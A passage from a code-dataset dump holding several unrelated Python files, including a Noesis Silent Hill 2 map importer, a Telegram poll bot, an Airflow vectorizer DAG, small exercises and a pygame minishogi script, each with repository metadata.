'\n\n appendToFile(path, cveReport)\n","repo_name":"Kccorp/KcVE","sub_path":"outputBuilder.py","file_name":"outputBuilder.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2509992489","text":"# Authors:\n# Laurynas Zubavičius (Sparagas)\n# Rodolfo Nuñez (roocker666)\n#\n# Buffer reading idea:\n# Murugo - https://github.com/Murugo/Misc-Game-Research/blob/main/PS2/Silent%20Hill%202%2B3/Blender/addons/io_sh2_sh3/import_map.py\n#\n# Original scripts:\n# Durik256 - https://forum.xentax.com/viewtopic.php?f=16&t=25765\n\nfrom inc_noesis import *\n\n\ndef registerNoesisTypes():\n handle = noesis.register(\"Silent Hill 2 (PS2)\", \".map\")\n noesis.setHandlerTypeCheck(handle, CheckType)\n noesis.setHandlerLoadModel(handle, LoadModel)\n # noesis.logPopup()\n return 1\n\n\ndef CheckType(data):\n if len(data) < 4:\n return 0\n if data[:4] != b'wwww':\n return 0\n return 1\n\n\ndef LoadModel(data, mdlList):\n bs = NoeBitStream(data)\n ctx = rapi.rpgCreateContext()\n\n def array(type, len):\n data = []\n for i in range(len):\n data.append(type())\n return data\n\n class FileHead:\n def __init__(self):\n self.magic = bs.readBytes(4)\n self.global_block_offs = bs.readUInt()\n self.local_block_offs = bs.readUInt()\n self.unk_raw_block_data_parms_offs = bs.readUInt()\n self.local_tex_index_offs = array(bs.readUInt, 3)\n self.local_tex_pal_offs = array(bs.readUInt, 3)\n self.local_tex_count = bs.readUInt()\n self.global_tex_count = bs.readUByte()\n self.trans_tex_count = bs.readUByte()\n self.unk_div_flg = bs.readUByte()\n self.unk_padc = bs.readUByte()\n\n class UnkRawBlockDataParms:\n def __init__(self):\n self.matrix_TRS_maybe = array(bs.readFloat, 12)\n self.unk = array(bs.readFloat, 12)\n\n class GlobalBlockHead:\n def __init__(self):\n self.unk_gsregsamount = bs.readUInt()\n self.unk_transamount = bs.readUInt()\n self.unk_gtexnum = bs.readUByte()\n self.unk_gtransnum = bs.readUByte()\n self.pad = array(bs.readUByte, 6)\n\n class LocalBlockHead:\n def __init__(self):\n self.unk_gsregsamount = array(bs.readUShort, 3)\n self.unk_transamount = array(bs.readUShort, 3)\n self.main_mesh_count = bs.readUShort()\n self.pad = array(bs.readUByte, 2)\n\n class MainMeshHead:\n def __init__(self):\n self.mesh_size = bs.readUInt()\n self.next_mesh_offs = bs.readUInt()\n self.tex_data_offs = bs.readUInt()\n self.sub_mesh_count = bs.readUByte()\n self.trans_count = bs.readUByte()\n self.unk_eop_flg = bs.readUByte()\n self.unk_tr_flg = bs.readUByte()\n self.unk_fmt = array(bs.readUByte, 16)\n self.unk_trans = array(bs.readUByte, 16)\n\n class SubMeshHead:\n def __init__(self):\n self.unk_gsregs_count = bs.readUShort()\n self.unk_trans_flg = bs.readUByte()\n self.unk_eop_flg = bs.readUByte()\n self.next_submesh_offs = bs.readUInt()\n self.sub_mesh_index = bs.readUShort()\n self.unk_tcc = bs.readUByte()\n self.unk_tfx = bs.readUByte()\n self.unk_abe = bs.readUByte()\n self.pad = array(bs.readUByte, 3)\n # it ends here in debug\n self.unkF = bs.readFloat()\n self.unkF = bs.readFloat()\n self.unk = bs.readUInt()\n self.unk = bs.readUInt()\n self.unk = bs.readUInt()\n self.unk = bs.readUByte()\n self.unk = bs.readUByte()\n self.unk = bs.readUByte()\n self.unk = bs.readUByte()\n self.size_plus144 = bs.readUInt()\n self.unk = bs.readUInt()\n self.vert_count = bs.readUShort()\n self.unk = bs.readUShort()\n self.size_plus112 = bs.readUInt()\n self.unk = bs.readUInt()\n self.unk = bs.readUShort()\n self.unk = bs.readUShort()\n self.pad_zero = array(bs.readUByte, 96)\n\n class VertAttr:\n def __init__(self):\n self.vp_x = bs.readUShort()\n self.vp_y = bs.readUShort()\n self.vp_z = bs.readUShort()\n self.vn_vcol_x = bs.readUShort()\n self.vt_u = bs.readUShort()\n self.vt_v = bs.readUShort()\n self.vn_vcol_y = bs.readUShort()\n self.vn_vcol_z = bs.readUShort()\n\n file_head = FileHead()\n bs.seek(file_head.unk_raw_block_data_parms_offs)\n unk_raw_block_data_parms = UnkRawBlockDataParms()\n\n if file_head.global_block_offs:\n\n bs.seek(file_head.global_block_offs)\n global_block_head = GlobalBlockHead()\n main_mesh_head = MainMeshHead()\n\n for s in range(main_mesh_head.sub_mesh_count):\n\n sub_mesh_head = SubMeshHead()\n\n rapi.rpgSetName('global_{}'.format(s))\n vbuf = b''\n ibuf = b''\n vnbuf = b''\n uvbuf = b''\n vcolbuf = b''\n reverse = False\n\n # vert_attr = array(VertAttr, sub_mesh_head.vert_count)\n\n for i in range(sub_mesh_head.vert_count):\n\n # vp_x = bs.readUShort()\n # vp_y = bs.readUShort()\n # vp_z = bs.readUShort()\n vbuf += bs.readBytes(6)\n vn_vcol_x = bs.readUShort()\n vt_u = bs.readUShort() # uv_flag[]\n vt_v = bs.readUShort() # uv_flag[]\n vn_vcol_y = bs.readUShort()\n vn_vcol_z = bs.readUShort()\n\n uv_flag = [vt_u, vt_v]\n vn_vcol = (vn_vcol_x, vn_vcol_y, vn_vcol_z)\n\n uvbuf += NoeVec3([uv_flag[0] / 0x8000, 1.0 - uv_flag[1] / 0x8000, 0]).toBytes()\n vnbuf += NoeVec3([(v & ~0x3F) / -0x8000 for v in vn_vcol]).normalize().toBytes()\n vcolbuf += NoeVec3([(v & 0x3F) / 0x20 for v in vn_vcol]).toBytes()\n\n flag = uv_flag[0] & 0x1\n if not flag:\n if reverse:\n ibuf += struct.pack('3H', i, i - 1, i - 2)\n else:\n ibuf += struct.pack('3H', i - 2, i - 1, i)\n reverse = not reverse\n rapi.rpgBindPositionBuffer(vbuf, noesis.RPGEODATA_SHORT, 6)\n rapi.rpgBindNormalBuffer(vnbuf, noesis.RPGEODATA_FLOAT, 12)\n rapi.rpgBindUV1Buffer(uvbuf, noesis.RPGEODATA_FLOAT, 12)\n rapi.rpgBindColorBuffer(vcolbuf, noesis.RPGEODATA_FLOAT, 12, 3)\n rapi.rpgCommitTriangles(ibuf, noesis.RPGEODATA_USHORT, len(ibuf) // 2, noesis.RPGEO_TRIANGLE)\n\n mdl = rapi.rpgConstructModel()\n bs.seek(sub_mesh_head.next_submesh_offs)\n\n if file_head.local_block_offs:\n\n bs.seek(file_head.local_block_offs)\n local_block_head = LocalBlockHead()\n\n for i in range(local_block_head.main_mesh_count):\n\n main_mesh_head = MainMeshHead()\n\n next_submesh_offs = bs.getOffset()\n for j in range(main_mesh_head.sub_mesh_count):\n sub_mesh_head = SubMeshHead()\n\n rapi.rpgSetName('local_{}_{}'.format(i, j))\n vbuf = b''\n ibuf = b''\n vnbuf = b''\n uvbuf = b''\n vcolbuf = b''\n reverse = False\n for i in range(sub_mesh_head.vert_count):\n vbuf += bs.readBytes(6)\n vn_vcol_x = bs.readShort()\n uv_flag = [bs.readShort(), bs.readShort()]\n vn_vcol = (vn_vcol_x, bs.readShort(), bs.readShort())\n uvbuf += NoeVec3([uv_flag[0] / 0x8000, 1.0 - uv_flag[1] / 0x8000, 0]).toBytes()\n vnbuf += NoeVec3([(v & ~0x3F) / -0x8000 for v in vn_vcol]).normalize().toBytes()\n vcolbuf += NoeVec3([(v & 0x3F) / 0x20 for v in vn_vcol]).toBytes()\n flag = uv_flag[0] & 0x1\n if not flag:\n if reverse:\n ibuf += struct.pack('3H', i, i - 1, i - 2)\n else:\n ibuf += struct.pack('3H', i - 2, i - 1, i)\n reverse = not reverse\n rapi.rpgBindPositionBuffer(vbuf, noesis.RPGEODATA_SHORT, 6)\n rapi.rpgBindNormalBuffer(vnbuf, noesis.RPGEODATA_FLOAT, 12)\n rapi.rpgBindUV1Buffer(uvbuf, noesis.RPGEODATA_FLOAT, 12)\n rapi.rpgBindColorBuffer(vcolbuf, noesis.RPGEODATA_FLOAT, 12, 3)\n rapi.rpgCommitTriangles(ibuf, noesis.RPGEODATA_USHORT, len(ibuf) // 2, noesis.RPGEO_TRIANGLE)\n\n mdl = rapi.rpgConstructModel()\n bs.seek(sub_mesh_head.next_submesh_offs)\n bs.seek(main_mesh_head.next_mesh_offs)\n mdlList.append(mdl)\n return 1\n","repo_name":"Sparagas/Silent-Hill","sub_path":"Noesis - Python Plugins/fmt_sh2_ps2_map.py","file_name":"fmt_sh2_ps2_map.py","file_ext":"py","file_size_in_byte":8774,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"27533117706","text":"#!/usr/bin/env python3\n\nimport sys\nimport json\nimport telepot\nimport logging\nimport argparse\nfrom telepot.delegate import pave_event_space, per_chat_id, create_open, include_callback_query_chat_id\nfrom telepot.namedtuple import InlineKeyboardMarkup, InlineKeyboardButton\n\n\"\"\"\nPython 3.5.2\nA Python bot for casting polls: the users who adds the bot to a group acts as the administrator and\nis the only one capable of starting and stopping polls\n\"\"\"\n\ntotalitario = {}\nsondaggi = {}\nwith open('groups.json', 'r') as f:\n\tgroups = json.load(f)\n\n# Deafults\nLOG_FILENAME = './Pollbot.log'\nlogging.basicConfig(filename=LOG_FILENAME,level=logging.INFO,format='%(asctime)s %(levelname)-8s %(message)s')\n\n# Define and parse command line arguments\nparser = argparse.ArgumentParser(description=\"My simple Python Telegram bot\")\nparser.add_argument(\"-l\", \"--log\", help=\"file to write log to (default '\" + LOG_FILENAME + \"')\")\nparser.add_argument(\"-T\", \"--TOKEN\", help=\"bot TOKEN identifier\")\n\n# If the log file is specified on the command line then override the default\nargs = parser.parse_args()\nif args.log:\n LOG_FILENAME = args.log\nif args.TOKEN:\n TOKEN = args.TOKEN\nelse:\n logging.error('No TOKEN specified')\n print(\"You must specify the bot's TOKEN\")\n sys.exit(0)\n\nlogger = logging.getLogger(__name__)\n\n# Make a class we can use to capture stdout and sterr in the log\nclass MyLogger(object):\n def __init__(self, logger, level):\n #Needs a logger and a logger level.\n self.logger = logger\n self.level = level\n\n def write(self, message):\n # Only log if there is a message (not just a new line)\n if message.rstrip() != \"\":\n self.logger.log(self.level, message.rstrip())\n\n# Replace stdout with logging to file at INFO level\n#sys.stdout = MyLogger(logger, logging.INFO)\n# Replace stderr with logging to file at ERROR level\nsys.stderr = MyLogger(logger, logging.ERROR)\n\n#Record everyone that writes to your bot\ndef chatter(msg):\n first_name = msg['from']['first_name']\n from_id = msg['from']['id']\n content_type, chat_type, chat_id = telepot.glance(msg)\n try:\n if msg['from']['username']:\n user_name = msg['from']['username']\n if chat_type == 'private':\n person = user_name + ': ' + str(from_id)\n elif chat_type == 'group' or chat_type == 'supergroup':\n group_name = msg['chat']['title']\n person = user_name + ': ' + str(from_id) + ' @ ' + group_name + ', ' + str(chat_id)\n except KeyError:\n if chat_type == 'private':\n person = 'No username - ' + str(first_name) + ': ' + str(from_id)\n elif chat_type == 'group' or chat_type == 'supergroup':\n group_name = msg['chat']['title']\n person = 'No username - ' + str(first_name) + ': ' + str(from_id) + ' @ ' + group_name + ', ' + str(chat_id)\n with open(\"./contatti.txt\", \"a\") as myfile:\n myfile.write(person + '\\n')\n\n#Per-chat class handler: every chat has its own variable space and keeps track of its poll\nclass MessageCounter(telepot.helper.ChatHandler):\n global groups\n def __init__(self, *args, **kwargs):\n super(MessageCounter, self).__init__(*args, **kwargs)\n self._poll_of_the_day = None\n self._markup = None\n self._message_with_inline_keyboard = None\n self._risultati = {}\n self._votanti = {}\n self._msg_idf = None\n self._owner = None\n\n def exitpoll(self, msg, chat_id, from_id, chat_type):\n if self._owner == None:\n self.sender.sendMessage('No ongoing poll')\n elif (chat_type == 'group' or chat_type == 'supergroup') and from_id == self._owner:\n try:\n exit_poll = self._poll_of_the_day + '\\n'\n for e in self._risultati.keys():\n exit_poll += e + ': ' + str(self._risultati[e]) + '\\n'\n self.sender.sendMessage(exit_poll)\n self._poll_of_the_day = None\n self._risultati = {}\n self._markup = None\n self._votanti = {}\n self._message_with_inline_keyboard = None\n logging.info('Poll closed in group %s', msg['chat']['title'])\n except TypeError:\n self.sender.sendMessage('No ongoing poll')\n elif (chat_type == 'group' or chat_type == 'supergroup') and from_id != self._owner:\n self.sender.sendMessage('Only the Great Master can put an end to an ongoing poll')\n elif chat_type == 'private':\n self.sender.sendMessage('You need to be in a group to stop a poll')\n\n\n def ongoing():\n if chat_type == 'group' or chat_type == 'supergroup':\n try:\n self._message_with_inline_keyboard = self.sender.sendMessage(self._poll_of_the_day, reply_markup=sondaggi[(str(chat_id), from_id)][1])\n except telepot.exception.TelegramError:\n self.sender.sendMessage('No poll set')\n else:\n self.sender.sendMessage('There cannot be polls outside groups')\n\n\n def dest(self, msg, chat_type, from_id):\n if chat_type == 'private':\n buttons = []\n element = [x for x in groups.keys() if groups[x][1] == from_id]\n for e in element:\n buttons.append([InlineKeyboardButton(text=e, callback_data=str(groups[e][0]))])\n contacts = InlineKeyboardMarkup(inline_keyboard=buttons)\n self.sender.sendMessage('Who have you created this poll for?', reply_markup=contacts) if len(element) != 0 else self.sender.sendMessage('You have to add me to a group first')\n else:\n self.sender.sendMessage('Polls destination have to be voted in the Great High Council')\n\n\n def poll(self, msg, chat_id, chat_type, from_id):\n\n if chat_type == 'group' or chat_type == 'supergroup':\n global sondaggi\n try:\n if (str(chat_id), from_id) in sondaggi.keys():\n self._owner = from_id\n self._poll_of_the_day = sondaggi[(str(chat_id), from_id)][0]\n self._message_with_inline_keyboard = self.sender.sendMessage(self._poll_of_the_day, reply_markup=sondaggi[(str(chat_id), from_id)][1])\n self._risultati = totalitario[str(chat_id)]\n del totalitario[str(chat_id)]\n logging.info('Poll started in group %s', msg['chat']['title'])\n else:\n self.sender.sendMessage('Only the Great Master of the Council can hold a poll')\n except telepot.exception.TelegramError:\n self.sender.sendMessage('No poll set')\n elif chat_type == 'private':\n lista = msg['text'].split(' . ')\n if len(lista) == 1:\n self.sender.sendMessage('No choices specified: poll not set')\n logging.info('Wrong request syntax')\n elif len(lista) > 1:\n self._poll_of_the_day = lista[0][6:]\n del lista[0]\n self._risultati = {}\n# logging.info('Poll set: %s', self._poll_of_the_day, lista)\n logging.info('Poll set')\n\n buttons = []\n for e in lista:\n self._risultati[e] = 0\n buttons.append([InlineKeyboardButton(text=e + ' (' + str(self._risultati[e]) + ')', callback_data=e)])\n self._markup = InlineKeyboardMarkup(inline_keyboard=buttons)\n self.sender.sendMessage('Poll set, only one choice possible') if len(lista) == 1 else self.sender.sendMessage('Poll set')\n \n \n def scrutatore(self, msg, data, from_id, query_id):\n try:\n if from_id not in self._votanti.keys():\n self._risultati[data] += 1\n self._votanti[from_id] = data\n bot.answerCallbackQuery(query_id, text=data + ': ' + str(self._risultati[data]))\n buttons = []\n for e in self._risultati.keys():\n buttons.append([InlineKeyboardButton(text=str(e) + ' (' + str(self._risultati[e]) + ')', callback_data=e)])\n self._markup = InlineKeyboardMarkup(inline_keyboard=buttons)\n self._msg_idf = telepot.message_identifier(self._message_with_inline_keyboard)\n logging.info('One vote from group')\n# print(self._poll_of_the_day)\n bot.editMessageText(self._msg_idf, self._poll_of_the_day, reply_markup=self._markup)\n else:\n if self._votanti[from_id] == data:\n bot.answerCallbackQuery(query_id, text=msg['from']['username'] + ' has already cast his vote')\n else:\n self._risultati[data] += 1\n self._risultati[self._votanti[from_id]] -= 1\n self._votanti[from_id] = data\n bot.answerCallbackQuery(query_id, text=data + ': ' + str(self._risultati[data]))\n buttons = []\n for e in self._risultati.keys():\n buttons.append([InlineKeyboardButton(text=str(e) + ' (' + str(self._risultati[e]) + ')', callback_data=e)])\n self._markup = InlineKeyboardMarkup(inline_keyboard=buttons)\n self._msg_idf = telepot.message_identifier(self._message_with_inline_keyboard)\n logging.info('One vote from group')\n bot.editMessageText(self._msg_idf, self._poll_of_the_day, reply_markup=self._markup)\n except (ValueError, KeyError):\n bot.answerCallbackQuery(query_id, text='Poll closed')\n\n\n def on_callback_query(self, msg):\n global sondaggi\n global totalitario\n\n query_id, from_id, data = telepot.glance(msg, flavor='callback_query')\n try:\n if int(data) < 0:\n totalitario[str(data)] = self._risultati\n sondaggi[data, from_id] = [self._poll_of_the_day, self._markup]\n logging.info('Destination chosen: %s', str(data))\n self.bot.answerCallbackQuery(query_id, text='All set')\n self.sender.sendMessage('All set')\n else:\n self.scrutatore(msg, data, from_id, query_id)\n except ValueError:\n self.scrutatore(msg, data, from_id, query_id)\n\n\n def help(self, chat_type):\n if chat_type == 'private':\n self.sender.sendMessage('This bot can hold polls in groups you\\'re in.\\nSend the poll in private chat using the command /poll with this syntax: \\n/poll Question . Choice 1 . Choice 2 . etc\\nNB: To separate question and choices you must type \\' . \\' , i.e. \\'*space dot space*\\'\\nNext use \\'/dest\\' to choose from a list of groups you\\'ve added this bot to.\\nWhile you are in a group, you can send /poll to start a poll, /ongoing to show the current poll, or /exitpoll to terminate it.', parse_mode='HTML')\n else:\n self.sender.sendMessage('You have to be in a private chat to ask for help')\n\n \n def on_chat_message(self, msg):\n global groups\n chatter(msg)\n content_type, chat_type, chat_id = telepot.glance(msg)\n from_id = msg['from']['id']\n logging.info('Message content: %s', content_type)\n logging.info('Chat type: %s', chat_type)\n if content_type == 'new_chat_member':\n groups[msg['chat']['title']] = [chat_id, from_id]\n with open('groups.json', 'w') as json_file:\n json.dump(groups, json_file, sort_keys=True, indent=4, separators=(',', ': '))\n logging.info('Added to %s', msg['chat']['title'])\n elif content_type == 'left_chat_member' and msg['left_chat_participant']['id'] == 287100649:\n del groups[msg['chat']['title']]\n with open('groups.json', 'w') as json_file:\n json.dump(groups, json_file, sort_keys=True, indent=4, separators=(',', ': '))\n logging.info('Removed from %s', msg['chat']['title'])\n else:\n text = msg['text'].replace(bot_name, '')\n logging.info('Text: %s', text)\n if text[:5] == '/poll':\n self.poll(msg, chat_id, chat_type, from_id)\n elif text == '/dest':\n self.dest(msg, chat_type, from_id)\n elif text == '/exitpoll':\n self.exitpoll(msg, chat_id, from_id, chat_type)\n elif text == '/help' or text == '/start':\n self.help(chat_type)\n\n\n#TOKEN = sys.argv[1] # get token from command-line\n\nbot = telepot.DelegatorBot(TOKEN, [\n include_callback_query_chat_id(pave_event_space())(\n per_chat_id(), create_open, MessageCounter, timeout=86400),\n])\nbot_name = '@' + bot.getMe()['username']\nlogging.info('Bot started')\nbot.message_loop(run_forever='Listening ...')\n\n","repo_name":"96Octavian/Pollbot","sub_path":"Pollbot_dist.py","file_name":"Pollbot_dist.py","file_ext":"py","file_size_in_byte":12898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32407876342","text":"import utils.airflow_features as Features\nimport utils.data_lake_helper as dl_helper\nfrom functools import partial\n\nimport airflow\nfrom airflow import DAG\nfrom airflow.models import Variable\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.operators.subdag_operator import SubDagOperator\n\nfrom features_utils import get_main_df\n\nmain_path = None\ndata_lake = None\nfile_extension = None\n\ndef init(main_path_, data_lake_, file_extension_):\n\tglobal main_path\n\tglobal data_lake\n\tglobal file_extension\n\t\n\tmain_path = main_path_\n\tdata_lake = data_lake_\n\tfile_extension = file_extension_\n\n\ndef fit_vector(vector):\n f_name = 'text_normalized'\n df = get_main_df()\n df[f_name] = data_lake.load_obj(f_name + '.pkl')\n train_x = df[df.path == (main_path + 'train_set/')][f_name]\n valid_x = df[df.path == (main_path + 'test_set/')][f_name]\n\n vector.model.fit(df[f_name])\n xtrain_v = vector.transform(train_x)\n xvalid_v = vector.transform(valid_x)\n\n #saving matrices\n data_lake.save_npz(xvalid_v, vector.xvalid_name + \".npz\")\n data_lake.save_npz(xtrain_v, vector.xtrain_name + \".npz\")\n data_lake.save_obj(vector, vector.name + \".pkl\")\n\n\ndef vector_extr_sub_dag(parent_dag_name, child_dag_name, args, schedule_interval):\n\n\tvectors = []\n\tvectors.append(Features.MyCountVectorizer(config=data_lake.load_config('count_vect_config.txt')))\n\tvectors.append(Features.MyWordTfidfVectorizer(config=data_lake.load_config('tf_idf_word_vect_config.txt')))\n\tvectors.append(Features.MyNGramTfidfVectorizer(config=data_lake.load_config('tf_idf_n_gram_vect_config.txt')))\n\tvectors.append(Features.MyCharTfidfVectorizer(config=data_lake.load_config('tf_idf_char_vect_config.txt')))\n\t\n\tdag = DAG('%s.%s' % (parent_dag_name, child_dag_name),\n\t\t\tdefault_args=args,\n\t\t\tstart_date=args['start_date'],\n\t\t\tmax_active_runs=1)\n\n\tstart = DummyOperator(task_id=\"start\", dag=dag)\n\n\tfeature_nodes = []\n\tfor vector in vectors:\n\n\t fnode = PythonOperator(\n\t task_id= 'get_' + vector.name,\n\t python_callable=partial(fit_vector, vector),\n\t dag=dag)\n\n\t feature_nodes.append(fnode)\n\n\tstart >> feature_nodes\n\n\treturn dag\n","repo_name":"nbuzzano/nlp-text-classification","sub_path":"dags/preprocessing/vector_features.py","file_name":"vector_features.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"31147245691","text":"\"\"\"Write a program that reads in a text file, infile.txt and writes to an\r\noutput file, outfile.txt. Your program should write all the lines in\r\ninfile.txt that have more than 15 characters to outfile.txt in all upper case.\r\"\"\"\r\n\r\nfileref = open(\"infile.txt\",'r')\r\n\r\noutfile = open(\"outfile.txt\",'w')\r\n\r\nfor line in fileref:\r\n if len(line) > 15:\r\n outfile.write(line)\r\n\r\nfileref.close()\r\noutfile.close()\r\n","repo_name":"Reikenzan/Some-Python","sub_path":"SomeWork/Fall2013/Q_7.py","file_name":"Q_7.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1127066089","text":"from gpiozero import DigitalOutputDevice \nfrom guizero import App, PushButton\n\npin = DigitalOutputDevice(18)\n\ndef start():\n start_button.disable()\n stop_button.enable()\n pin.on()\n\ndef stop():\n start_button.enable()\n stop_button.disable()\n pin.off()\n\napp = App(width=100, height=150)\nstart_button = PushButton(app, command=start, text=\"On\")\nstart_button.text_size = 30\nstop_button = PushButton(app, command=stop, text=\"Off\", enabled=False)\nstop_button.text_size = 30\napp.display()\n","repo_name":"simonmonk/raspberrypi_cookbook_ed3","sub_path":"python/ch_10_gui_switch.py","file_name":"ch_10_gui_switch.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"72"} +{"seq_id":"43305693113","text":"#\n# @lc app=leetcode id=543 lang=python\n#\n# [543] Diameter of Binary Tree\n#\n\n# @lc code=start\n# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution(object):\n def diameterOfBinaryTree(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n self.max = 0\n self.dfs(root)\n return self.max\n\n def dfs(self, root):\n if not root:\n return -1\n left = self.dfs(root.left) + 1\n right = self.dfs(root.right) + 1\n self.max = max(left + right, self.max)\n return max(left, right)\n\n\n# root = TreeNode(1)\n# root.left = TreeNode(2)\n# root.left.left = TreeNode(4)\n# root.left.righ = TreeNode(5)\n# root.right = TreeNode(3)\n# print Solution().diameterOfBinaryTree(root)\n\n# @lc code=end\n\n","repo_name":"atalia/leetcode","sub_path":"543.diameter-of-binary-tree.py","file_name":"543.diameter-of-binary-tree.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37512533421","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jun 10 22:11:36 2020\r\n\r\n@author: wudi\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\nimport statsmodels.api as sm\r\nfrom Toolbox import DataStructuring \r\nfrom scipy import stats\r\nfrom datetime import datetime, timedelta\r\nDS=DataStructuring()\r\n\r\ntoday=datetime.today()-timedelta(days=1)\r\nrebalday=[str(today)[0:10]]\r\ndf=pd.read_csv(\"D:/SecR/HK_Data.csv\")\r\ndf=df.dropna()\r\ndf['Sector']=df['Sector'].astype(str)\r\ndf['MarketCap']=df['MarketCap'].apply(np.log)\r\ndf['PE']=1/df['PE']\r\ndf['Turnover']=1/df['Turnover']\r\ndffull=df.copy()\r\ndfcut=df['MarketCap'].quantile(0.3)\r\ndfcut=dffull.loc[dffull['MarketCap']>=dfcut,:].copy()\r\n\r\ndef HK_Analysis(df):\r\n indu_dummy=pd.get_dummies(df['Sector'])\r\n df=pd.concat([df,indu_dummy],axis=1)\r\n df=df.reset_index(drop=True)\r\n Xset=['MarketCap']\r\n Xset.extend(indu_dummy.columns)\r\n selectsigs=['ROE','SalesGrowth','PE','Turnover']\r\n df.iloc[:,1:]=df.iloc[:,1:].astype(float)\r\n for sig in selectsigs:\r\n dfnona=df.loc[df[sig].isna()==False,:].copy()\r\n dfnona=DS.Winsorize(dfnona,sig,0.02)\r\n dfnona[sig]=dfnona[sig].astype(float)\r\n dfnona[Xset]=dfnona[Xset].astype(float)\r\n est=sm.OLS(dfnona[sig],dfnona[Xset]).fit()\r\n dfnona['N_'+sig]=est.resid.values\r\n df=pd.merge(df,dfnona[['Ticker','N_'+sig]],on='Ticker',how='left')\r\n df=df[['Ticker', 'ROE', 'SalesGrowth', 'PE', 'Turnover', 'MarketCap', 'Sector','N_ROE', 'N_SalesGrowth', 'N_PE', 'N_Turnover']]\r\n dfnew=df[['Ticker','N_ROE','N_SalesGrowth','N_PE','N_Turnover']].copy()\r\n for sig in selectsigs:\r\n dfnona=dfnew.loc[dfnew['N_'+sig].isna()==False,:].copy()\r\n dfnona[sig+'_zscore']=stats.zscore(dfnona['N_'+sig])\r\n dfnew=pd.merge(dfnew,dfnona[['Ticker',sig+'_zscore']],on='Ticker',how='left')\r\n df=pd.merge(df,dfnew[['Ticker','ROE_zscore','SalesGrowth_zscore','PE_zscore','Turnover_zscore']],on='Ticker',how='left')\r\n df=df.rename(columns={'ROE_zscore':'Quality_zscore'})\r\n df=df.rename(columns={'SalesGrowth_zscore':'Growth_zscore'})\r\n df=df.rename(columns={'Value_zscore':'Value_zscore'})\r\n df=df.rename(columns={'Turnover_zscore':'Market_zscore'})\r\n return(dfnew,df)\r\n\r\ntoday=datetime.today()\r\ntodayname=str(today.strftime(\"%Y-%m-%d\"))\r\ndfnew,df=HK_Analysis(dffull)\r\n#dfnew.to_csv(\"D:/CompanyData/CompanyDataFullUniverse_HK_\"+todayname+\".csv\",index=False)\r\ndf.to_csv(\"D:/CompanyData/GentableFullUniverse_HK_\"+todayname+\".csv\",index=False)\r\n\r\ndfnew,df=HK_Analysis(dfcut)\r\ndf.to_csv(\"D:/CompanyData/Gentable_HK_\"+todayname+\".csv\",index=False)","repo_name":"Steinrichwu/SecR","sub_path":"HK_Update.py","file_name":"HK_Update.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24283909658","text":"import pygame\nimport time \nimport os\nfrom copy import copy, deepcopy\n\npygame.init()\n\n#Screen Dimensions and Offsets \nscreen_width=880\nscreen_height=550\nsquaresize = 90\nx_offset = 215\ny_offset = 50\n\n#Files to Read \n#board_file=\"//home//ailab_server//fb_polygames//Polygames//MS_board.txt\"\n#moves_file=\"//home//ailab_server//fb_polygames//Polygames//moves_list.txt\"\n\nboard_file= \"boards//MS_board.txt\"\nmoves_file =\"moves//minishogi_moves.txt\"\n\n#Player Pieces to Load \nR = pygame.image.load(\".//res//minishogi_res//R.png\")\nK = pygame.image.load(\".//res//minishogi_res//K.png\")\nB = pygame.image.load(\".//res//minishogi_res//B.png\")\nP = pygame.image.load(\".//res//minishogi_res//P.png\")\nG = pygame.image.load(\".//res//minishogi_res//G.png\")\nS = pygame.image.load(\".//res//minishogi_res//S.png\")\nP_Pro = pygame.image.load(\".//res//minishogi_res//+P.png\")\nS_Pro = pygame.image.load(\".//res//minishogi_res//+S.png\")\nB_Pro = pygame.image.load(\".//res//minishogi_res//+B.png\")\nR_Pro = pygame.image.load(\".//res//minishogi_res//+R.png\")\nlegal_move_indicator = pygame.image.load(\".//res//minishogi_res//move_indicator.png\") #WHITE piece \nselection=pygame.image.load(\".//res//minishogi_res//selection.png\") #red border \n\n#Transformations to Images used\nEnemy_R = pygame.transform.rotate(R,180)\nEnemy_K = pygame.transform.rotate(K,180)\nEnemy_B = pygame.transform.rotate(B,180)\nEnemy_P = pygame.transform.rotate(P,180)\nEnemy_G = pygame.transform.rotate(G,180)\nEnemy_S = pygame.transform.rotate(S,180)\nEnemy_P_Pro = pygame.transform.rotate(P_Pro,180)\nEnemy_S_Pro = pygame.transform.rotate(S_Pro,180)\nEnemy_B_Pro = pygame.transform.rotate(B_Pro,180)\nEnemy_R_Pro = pygame.transform.rotate(R_Pro,180)\n\n#Colors to use \nbrown_square= (185,136,38)\nbrown_index = (156,108,10) #orangy \nblack = (0,0,0)\nwhite =(255,255,255)\nmenu_area_color=(42,51,64)\n\n#matrix to link moves to i,j position values \nposition_letter_grid_5=[\n['a1', 'b1', 'c1', 'd1', 'e1'],\n['a2', 'b2', 'c2', 'd2', 'e2'],\n['a3', 'b3', 'c3', 'd3', 'e3'],\n['a4', 'b4', 'c4', 'd4', 'e4'],\n['a5', 'b5', 'c5', 'd5', 'e5']\n]\n\n#used to draw text to screen\ndef draw_text(text, size, color, x,y): \n font = pygame.font.SysFont(pygame.font.get_default_font(),size)\n text_surface = font.render(text, True, color)\n text_rect = text_surface.get_rect() \n text_rect.center = (x,y)\n 